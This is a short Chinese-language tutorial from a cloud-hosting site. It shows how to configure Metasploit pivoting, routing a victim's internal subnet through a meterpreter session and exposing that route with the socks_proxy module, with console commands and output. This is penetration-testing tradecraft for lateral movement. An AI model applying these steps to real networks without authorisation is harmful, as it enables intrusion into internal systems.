您好,登錄后才能下訂單哦!
這篇文章主要介紹“meterpreter中如何開啟pivot代理”,在日常操作中,相信很多人在meterpreter中如何開啟pivot代理問題上存在疑惑,小編查閱了各式資料,整理出簡單好用的操作方法,希望對(duì)大家解答”meterpreter中如何開啟pivot代理”的疑惑有所幫助!接下來,請(qǐng)跟著小編一起來學(xué)習(xí)吧!
pivot是meterpreter最常用的一種代理,可以輕松把你的機(jī)器代理到受害者內(nèi)網(wǎng)環(huán)境。
使用方法:
route add 目標(biāo)i或ip段 Netmask 要使用代理的會(huì)話ID
通過實(shí)例來說明:
在metasploit添加一個(gè)路由表,目的是訪問172.16.100.0/24這個(gè)網(wǎng)段,將通過meterpreter的會(huì)話 1 來訪問:
msf6 exploit(multi/handler) > route add 172.16.100.0 255.255.255.0 1 [*] Route added msf6 exploit(multi/handler) > route print IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 172.16.100.0 255.255.255.0 Session 1 [*] There are currently no IPv6 routes defined.
到這里pivot已經(jīng)配置好了,你在msf里對(duì) 172.16.100.0/24 進(jìn)行掃描(db_nmap)或者訪問(psexe 模塊,ssh模塊等)將通過代理session 1這個(gè)會(huì)話來訪問。
如果想通過其他應(yīng)用程序來使用這個(gè)代理怎么辦呢,這時(shí)候可以借助 metasploit socks_proxy提供一個(gè)監(jiān)聽隧道供其他應(yīng)用程序訪問:
首先使用 socks_proxy并且配置,監(jiān)聽端口:
msf6 auxiliary(scanner/ssh/ssh_login) > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > show options Module options (auxiliary/server/socks_proxy): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no Proxy password for SOCKS5 listener SRVHOST 0.0.0.0 yes The address to listen on SRVPORT 1080 yes The port to listen on USERNAME no Proxy username for SOCKS5 listener VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5) Auxiliary action: Name Description ---- ----------- Proxy Run a SOCKS proxy server msf6 auxiliary(server/socks_proxy) > set srvport 1011 srvport => 1011 msf6 auxiliary(server/socks_proxy) > run [*] Auxiliary module running as background job 1. msf6 auxiliary(server/socks_proxy) > [*] Starting the SOCKS proxy server
到此,關(guān)于“meterpreter中如何開啟pivot代理”的學(xué)習(xí)就結(jié)束了,希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí),快去試試吧!若想繼續(xù)學(xué)習(xí)更多相關(guān)知識(shí),請(qǐng)繼續(xù)關(guān)注億速云網(wǎng)站,小編會(huì)繼續(xù)努力為大家?guī)砀鄬?shí)用的文章!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。